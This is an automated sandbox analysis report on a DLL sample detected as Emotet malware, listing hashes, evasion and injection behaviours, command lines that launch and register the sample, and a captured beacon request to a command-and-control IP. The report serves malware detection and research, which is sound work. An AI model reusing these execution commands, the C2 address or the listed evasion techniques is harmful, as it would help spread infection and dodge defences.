Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TSvDnT6fkE

Overview

General Information

Sample Name:TSvDnT6fkE (renamed file extension from none to dll)
Analysis ID:626488
MD5:81fbd732b50a5593d32234e232d59ece
SHA1:4e0d8774739060edf16cb1956934840bc8e9a55a
SHA256:6aaf58cdff2d8c1a9f8ca6caaa1445d2574dcec8b25ef57c050ce3e688e06b5d
Tags:exetrojan
Infos:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6328 cmdline: loaddll64.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6336 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6356 cmdline: rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6344 cmdline: regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 6484 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ErRMcfUGTVTj\myfGzaHssmULBwf.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 6364 cmdline: rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6416 cmdline: rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6536 cmdline: C:\Windows\system32\WerFault.exe -u -p 6416 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 6572 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6608 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6728 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6896 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6944 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4904 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000006.00000002.790902052.0000000002560000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000002.306506166.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000005.00000002.306832170.00000164C9870000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000005.00000000.287051568.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.18475ef0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.2.regsvr32.exe.2560000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.2.regsvr32.exe.1e20000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  5.2.rundll32.exe.164c9870000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    5.0.rundll32.exe.164c9870000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 9 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: TSvDnT6fkE.dllVirustotal: Detection: 33%Perma Link
                      Source: https://23.239.0.12/ionTAvira URL Cloud: Label: malware
                      Source: https://23.239.0.12/$Avira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49749 version: TLS 1.2
                      Source: TSvDnT6fkE.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: rundll32.exe, 00000005.00000000.288227813.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.306608611.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.789915273.00000000008E5000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: rundll32.exe, 00000005.00000000.288227813.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.306608611.00000064947A6000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.789915273.00000000008E5000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: qrKqRouLIbia=+JAHxLl8OYS5hw3a/60tSu2H1h9X2OJ54mhCWe5SmyAhKfL8GWOFw669cGkfnZLVb0yMbqJ6rHioy31dS+HwuzFFwYFGwAPPqH2MgAnmjEjTH2ZCD1kuOW4KwP7MER5OcCjrfeC57RTJYrFD7oNsUHCW5BSgfN3VXyx8/dMUV5Nv6TUOLacmecrm0GngY7TmKnLuL3ttJvRYLXmxjbERnwCj30SI3jxXtkUnBCWpgy7T972uAnp8KFqOqabLiorbj2SAQoJZeYAr8b8hyT5yu9yP2vZmUlwFCG/dB+hhupgwMQ6OVrIIGL4zoM7czZbAltxHHSFpv/ZcqrPmrH53Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 00000021.00000003.532165617.00000256D7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000021.00000003.532165617.00000256D7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000021.00000003.531317350.00000256D7F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000021.00000003.531317350.00000256D7F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000021.00000003.531317350.00000256D7F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Ca equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000021.00000003.531317350.00000256D7F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Ca equals www.twitter.com (Twitter)
                      Source: regsvr32.exe, 00000006.00000003.350123240.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350380079.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790720765.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.671797088.000001CF09089000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.584235120.00000256D7F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000012.00000002.671797088.000001CF09089000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.583956411.00000256D76EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000012.00000002.671481394.000001CF038AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlso
                      Source: svchost.exe, 0000000C.00000002.330829301.0000020EAE213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000003.350257586.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790154873.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000006.00000003.350257586.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790154873.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/$
                      Source: regsvr32.exe, 00000006.00000003.350257586.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.790154873.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/ionT
                      Source: svchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000002.790369287.000001A81443C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000003.330435981.0000020EAE25E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
